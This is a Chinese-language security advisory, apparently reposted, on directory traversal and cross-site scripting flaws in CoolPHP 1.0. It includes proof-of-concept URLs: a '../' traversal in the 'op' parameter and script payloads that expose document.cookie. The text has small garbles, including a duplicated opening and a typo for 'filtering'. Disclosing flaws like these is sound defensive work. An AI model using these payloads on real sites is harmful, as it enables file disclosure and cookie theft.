CoolPHP远程任意文件查看及脚本执行漏洞
受影响系统: CoolPHP CoolPHP 1.0 描述: CoolPHP是一款基于PHP的网站构建系统。 CoolPHP多处没有正确验证用户提交的输入,远程 攻击 者可以利用这个 漏洞 以WEB进程权限在系统上执行任意命令或进行脚本执行 攻击 。 'index.php'对用户提交给"op"参数的数据
受影响系统:
CoolPHP CoolPHP 1.0
描述:
CoolPHP是一款基于PHP的网站构建系统。
CoolPHP多处没有正确验证用户提交的输入,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令或进行脚本执行攻击。
'index.php'对用户提交给"op"参数的数据缺少充分锅炉,提交包含多个'../'的字符作为参数数据,可绕过WEB ROOT限制以系统权限查看文件内容。
另外对'buscar'模块的'query'参数和'userinfo'模块的'nick'参数缺少充分HTML代码检查,构建恶意链接,诱使用户访问,可能泄露用户敏感信息。
<*来源:R00tCr4ck (root@cyberspy.org)
链接:_blank>http://www.securitytracker.com/alerts/2004/Oct/1011748.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
R00tCr4ck (root@cyberspy.org)提供了如下测试方法:
查看文件内容信息:
http://[victim]/index.php?op=../../../../anotheruser/evilfile
跨站脚本攻击:
http://[victim]/index.php?op=buscar&query=<script language=javascript>window.alert(document.cookie);</script>
http://[victi m]/index.php?op=buscar&query=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
http://[victim]/index.php?op=userinfo&nick=<script language=javascript>window.alert(document.cookie);</script>
建议:
厂商补丁:
CoolPHP
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
_blank>http://cphp.sourceforge.net/
原文转自:http://www.ltesting.net
|